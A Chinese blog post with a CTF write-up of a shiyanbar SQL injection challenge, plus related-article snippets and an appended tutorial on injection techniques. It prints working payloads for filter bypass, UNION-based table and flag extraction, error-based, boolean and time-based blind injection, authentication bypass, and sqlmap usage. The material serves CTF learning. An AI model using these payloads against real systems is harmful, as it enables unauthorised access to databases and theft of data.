实验吧三道sql注入题目解题思路以及当中至少点整理(简单的SQL注入、简单的SQL注入2、简单的SQL注入)

最新推荐文章于 2025-07-28 15:51:45 发布
最新推荐文章于 2025-07-28 15:51:45 发布
阅读量4.1k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF以及信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/xiaotaode2012/article/details/77112993
本文详细介绍了实验吧中的三道SQL注入题目解题过程,包括简单的SQL注入、简单的SQL注入2和简单的SQL注入3。通过尝试不同payload,作者展示了如何判断过滤字符、绕过WAF、获取表名、列名及字段数据的方法,同时总结了学习重点。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x00

最近学习CTF有一段时间了,下面将实验吧三题题目的简单SQL注入进行一定的整理,

0x01 简单的sql注入

做题的地址为: http://ctf5.shiyanbar.com/423/web/

第一步:随便输入个数字load下url:http://ctf5.shiyanbar.com/423/web/?id=1发现是这个,老套路,既然题目提示是过滤 我们来各种试试到底过滤了什么
第二步:payload:http://ctf5.shiyanbar.com/423/web/?id=1'发现报错可以确定是字符型的注入,那来了来试试到底过滤了啥吧,尝试用payload如下:http://ctf5.shiyanbar.com/423/web/?id=1' union %23 select order by from or '1'='1,发现过滤得还挺多的基本都过 滤了,好吧来试试如何绕过吧
第三步:一般的套路绕过:内联注释、双重关键字、大小写混用、编码、。。。。。算了绕WAF的比较多,这里就不总结了改日另开新帖来说吧,这里有篇文章还不错推荐给大家:http://www.bugku.com/forum.phpmod=viewthread&tid=128&extra=page%3D1
第四步:http://ctf5.shiyanbar.com/423/web/?id=1'/**/unionunion/**/selectselect/**/table_name/**/fromfrom/**/information_schema.tables/**/wherewhere/**//**/'1'='1这 样尝试爆出表名来,居然报错,好吧 我来两个空格,估计是有个过滤函数,1'  unionunion  selectselect  table_name  fromfrom  information_schema.tables  wherewhere  '1'='1这样可以得到表,
第五步:同样可以得到列名以及字段的数据最终payload如下:
1'  unionunion  selectselect  flag  fromfrom  flag  wherewhere  '1'='1

总结:学到的知识:如何判断过滤了哪些字符;如果绕WAF

最低0.47元/天 解锁文章

200万优质内容无限畅学
pikachu sql注入题解
L1ni01
07-17 534
第一关.数字型注入(post) 首先我们介绍一下数字型和字符型的sql注入 sql注入大致也可分为数字型和字符型 如何判断是数字型还是字符型呢 数字型判断: 当输入的参 x 为整型时,通常 abc.php 中 Sql 语句类型大致如下: select * from <表名> where id = x 这种类型可以使用经典的 and 1=1 和 and 1=2 来判断: Url 地址中输入 http://xxx/abc.php?id= x and 1=1 页面依旧运行正常,继续进行下一步
实验吧Web-易-简单sql注入之3(报错的sql盲注之exp)
Sea_Sand息禅
12-18 427
题目提示是报错注入,于是就用盲注技巧来注入。 这里注入时发现floor,extractvalue,updatexml被吃掉了,用exp可以注入成功。(记住大小写绕过等技巧) 1.爆库 ' or exp(~(select * from(select database())a))# 这里最后面的a处可为别的字母,且必须要有 可以看到库名为web1。 2,爆表 ' or exp(~(...
sql注入(基础)题解
agoodboy6的博客
11-04 371
上述语句的结构,可以将information-schema.schemata/tables/columns看作所要查询的范围,而where后的语句作为上一步语句查询获取的信息又使得此步查询更加准确。原理:在SQL注入攻击过程中,服务器开启了错误回显,页面会返回错误信息,利用报错函数获取数据库数据。select * from member where id='$id' 字符型sql语句。初次尝试,发现显示结果不全,推测此题对回显长度有限制。table-name与table-name呼应。
SQL 三种注入方式详解,(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
05-27 3955
MySQL 提供了 load_file() 函数,可以帮助用户快速读取文件,但文件的位置必须在服务器上,文件必须为绝对路径,且用户必须有 FILE 权限,文件容量也必须小于 max_allowed_packet 字节 (默认为 16MB,最大为 1GB)SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
实验简单SQL注入1,简单SQL注入
weixin_30770783的博客
05-07 222
接上面一篇博客。 实验简单sql注入1 题目连接 http://ctf5.shiyanbar.com/423/web/ 同样,直接输入 1加个但引号,结果下面有返回错误, , 有错,所以估计这里应该是要闭合,字符行注入,但是这个标题,到底过滤了什么,目前我还不知道过滤了什么,所以先搞一下。。 输入 1' and 1=1# 按理...
实验吧 登陆一下好吗?? 简单注入 By Assassin
Assassin
01-30 6441
题目想法挺简单的,是时候学习一下注入的套路了,真的要不简单的也想不到。发现* / select union or 都被过滤了,一开始想的太复杂了,以为是个什么waf过滤什么的,但是看了pcat前辈的WP发现真的很基础吧。但是and ‘什么的都没有过滤!payload真的简单到淫荡,看一下就是这样的 admin-> ‘=’ password-> ‘=’ 真是醉了,为
网络安全CTF Web实战练习:常见Web漏洞利用与防护技巧详解-SQL注入、脚本编写及数据包分析
最新发布
08-18
每个题目详细介绍了解题思路、使用的技术手段以及最终获得的flag。涉及的技术包括SQL注入及其变种(如异或注入、报错注入)、Python脚本编写、Burpsuite抓包改包、代码审计、URL编码与解码、Base64编码与解码、...
网络安全CTF Web实战练习:基于SQL注入、Python脚本与Wireshark的数据包分析及漏洞利用技术总结
05-13
内容概要:本文档是关于CTF Web题型的总结,重介绍了在Bugku平台上的实战练习题目及其解题思路。文章分为两大部分,涵盖了从简单SQL注入到复杂的日志审计和Wireshark分析等多种Web安全挑战。每个题目不仅提供了...
CTF-Web学习笔记:SQL注入
Deng7326的博客
07-28 1098
本文系统梳理了CTF竞赛中SQL注入的核心原理与实战技巧。首先介绍了SQL注入的基础概念和成因,即用户输入数据被直接拼接到SQL语句中执行。其次分类解析了CTF常见的注入类型,包括数字/字符串型注入、报错/盲注/联合查询等攻击方式。文章重分享了实战经验:如何判断注入、确定数据库类型、使用工具辅助及绕过WAF防御。最后通过一道报错注入题目,详细演示了从数据库名获取到最终拿Flag的完整解题流程,并推荐了SQLiLabs等练习平台。
80.WHUCTF之WEB类解题思路WP(代码审计、文件包含、过滤绕过、SQL注入)_杨秀璋的专栏-优快云博客1
08-03
这是一道SQL注入相关的题目SQL注入是攻击者通过输入恶意SQL语句来控制或获取数据库信息的一种攻击手段。作者可能介绍了如何识别SQL注入漏洞,以及利用注入漏洞进行数据提取或系统控制的方法。解题思路可能包括...
sql注入之盲注
A1956936030的博客
09-23 402
一.布尔型盲注 题目题目sqllab-less-8 1.(1)正常页面回显 ?id=1 and 1=1 (2)页面出错 ?id=1' and 1=2 2.先判断数据库长度 ?id=0' or length(database())>7--+ true ?id=0' or length(database())>8--+ false ?id=0' or length(database())=8--+ true 最后确认数据库长度为8 3.猜库名 此时我们需要
SQL注入题1
慢慢变小佬的博客
07-06 858
service mysql start;mysql -u root -q;use mysql;show databases;id=1 order by 3 判断列数id =-1 union select 1,2,3 判断出现位数id=-1 union select 1,use(),database() 查询数据库名id=-1 union select 1,(select table_name fr...
简单sql注入学习
weixin_33807284的博客
08-26 150
sql注入是什么? 所谓SQL注入,就是通过把SQL命令插入到Web表单提 交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据 库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。比如先前的很多影视网站泄露VIP...
ctf题库--简单sql注入
miko2018的博客
08-21 6079
&lt;题目&gt; mysql报错注入 格式:flag{} 解题链接: http://ctf5.shiyanbar.com/web/index_3.php &lt;解答&gt; 1.打开题目链接,在查询中输入1,发现地址栏变化。 2.认为这里可能(看题目其实知道是一定)存在一个sql注入。 3.使用工具sqlmap进行注入(以该地址栏id值为例)。 查看当前数据库: Sqlmap -u "...
简单sql注入——实验
weixin_34290631的博客
07-11 528
刚刚做了实验吧的题目,现在整理一下 写出解题思路,希望能够帮助到那些需要帮助的人 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! 永远爱你们的————新宝宝 简单sql注入分值:10 来源:实验吧 难度:中 参与人数:18007人 Get Flag:5644人 答题人数:651...
网络安全--最简单sql注入
nuoman_cheng的博客
11-10 1190
我们平常见到的输入框: 如果用户输入: 用户名:user1 or '1'='1' 密码   : passwd1 or '1'='1' 那么,SQl会产生为: select * from  ziliao  where  username=user1 or '1'='1'  and  password = passwd1 or '1'='1' 后面的条件就永远为真,就绕过去
超详细,手把手教你一次简单SQL注入,不用任何工具,带你走进web安全的大门
weixin_55634477的博客
03-14 1260
超详细,手把手教你一次简单SQL注入,不用任何工具,带你走进web安全的大门 靶场网站,网站所有权在知识盒子 知识盒子 老套的题目:提取网站数据库中存储的数据(flag) 打开网页 首先嘛,实验一下网站的功能 简单查询功能 正常操作一下 输入相应提示1 得到正确的反馈信息 错误操作一下 错误的反馈信息 右键查看网页源代码,看有么有可用信息 这里,可以得到最有可能查询的字段名称 让我们试试推理一下网站最有可能的SQL语句 条件查询语句 select 相应字段不清楚 from 表不清楚 where
完成一次简单SQL 注入
wujiandao的专栏
09-03 551
先来看几起 SQL 注入的安全事件: Joomla 对象注入漏洞 事件概述:2015年10月29日国外知名CMS(内容管理系统)Joomla,爆出存在SQL注入漏洞,该漏洞影响了 1.5 到 3.4.5 的所有版本,漏洞利用无须登录,直接在前台即可执行任意PHP代码。这个漏洞在libraries/joomla/sesion/sesion...
SQL TIPS
Andrewniu的博客
12-05 434
SQL语言,是结构化查询语言(Structured Query Language)的简称。SQL语言是一种数据库查询和程序设计语言,用于存取数据以及查询、更新和管理关系数据库系统;同时也是数据库脚本文件的扩展名。 1,collate是一个子句,可应用于数据库定义或列定义以定义排序规则,或应用于字符串表达式以应用排序规则投影。 语法是collate collation_name  
ctf sql注入题目讲解
08-10
在CTF(Capture The Flag)比赛中,SQL注入是一种常见的Web安全挑战类型,通常涉及对数据库的非法操作以获取敏感信息或绕过安全机制。这类题目要求参赛者具备扎实的SQL基础以及对Web漏洞的理解能力。以下是一些常见的SQL注入解题思路与解析方法。 ### 1. SQL注入的基本原理 SQL注入通常发生在应用程序未正确过滤用户输入的情况下,攻击者通过在输入中插入恶意SQL代码来操控数据库查询。例如,一个简单的登录验证查询可能如下: ```sql SELECT * FROM users WHERE username = 'admin' AND password = 'password'; ``` 如果输入未经过滤,攻击者可以通过输入 `' OR '1'='1` 来绕过验证: ```sql SELECT * FROM users WHERE username = 'admin' AND password = '' OR '1'='1'; ``` ### 2. 寻找注入 寻找注入SQL注入的第一步,通常涉及对输入参数的测试。常见的注入包括URL参数、POST请求中的表单字段、Cookie等。判断是否存在注入的方法包括: - 输入单引号 `'`,查看是否出现SQL错误。 - 使用 `AND 1=1` 和 `AND 1=2` 测试,观察页面反应是否不同。 - 使用 `ORDER BY` 确定查询中列的数量。 ### 3. 联合查询注入 联合查询注入(Union Injection)是利用 `UNION` 操作符将多个查询结果合并返回。通过构造恶意输入,攻击者可以获取数据库中的敏感信息。例如: ```sql ' UNION SELECT 1, group_concat(table_name) FROM information_schema.tables WHERE table_schema='ctfhub' -- ``` 此语句可以用于获取数据库中的表名。 ### 4. 半自动化注入工具 工具如 `sqlmap` 可以帮助自动化SQL注入过程。`sqlmap` 支持多种注入技术,包括布尔盲注、时间盲注、报错注入等。常用命令包括: ```bash sqlmap -u "http://example.com/page?id=1" --dbs ``` 该命令用于检测目标URL是否存在注入,并列出数据库。 ### 5. 布尔盲注 布尔盲注适用于无法直接看到错误信息的情况。通过构造条件查询,攻击者可以根据页面反应判断条件是否成立。例如,通过以下语句获取数据库名: ```sql ' AND (SELECT SUBSTRING(database(),1,1)) = 'a' -- ``` 如果页面返回正常,则说明数据库名的第一个字符是 `a`。 ### 6. 时间盲注 时间盲注通过 `SLEEP()` 函数延迟响应时间来判断条件是否成立。例如: ```sql ' AND IF((SELECT SUBSTRING(database(),1,1)) = 'a', SLEEP(5), 0) -- ``` 如果页面响应延迟5秒,则说明条件成立。 ### 7. 报错注入 报错注入利用数据库的错误信息返回数据。例如,使用 `extractvalue()` 函数触发错误并返回数据: ```sql ' AND extractvalue(1, concat(0x7e, (SELECT database()), 0x7e)) -- ``` ### 8. 绕过过滤机制 在某些情况下,过滤机制会阻止常见的SQL关键字。攻击者可以通过以下方式绕过过滤: - 使用大小写混合,如 `UNiOn SelECt`。 - 使用编码,如URL编码、十六进制编码。 - 使用特殊符号替代空格,如 `/**/`。 ### 9. 获取敏感信息 一旦确认注入,攻击者可以进一步获取数据库中的敏感信息。例如,获取数据库名、表名和字段名: ```sql ' UNION SELECT 1, group_concat(table_name) FROM information_schema.tables WHERE table_schema='ctfhub' -- ``` 获取表中的字段名: ```sql ' UNION SELECT 1, group_concat(column_name) FROM information_schema.columns WHERE table_name='flag' -- ``` 最终获取表中的内容: ```sql ' UNION SELECT 1, group_concat(flag) FROM flag -- ``` ### 10. 实战技巧 - **使用脚本自动化**:编写Python脚本可以提高效率,特别是在处理大量数据时。 - **注意编码问题**:确保输入的编码与数据库一致,避免乱码。 - **测试环境**:在本地搭建测试环境,避免对真实系统造成影响。 通过以上方法,参赛者可以在CTF比赛中更有效地解决SQL注入题目。掌握这些技巧需要不断练习和总结经验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值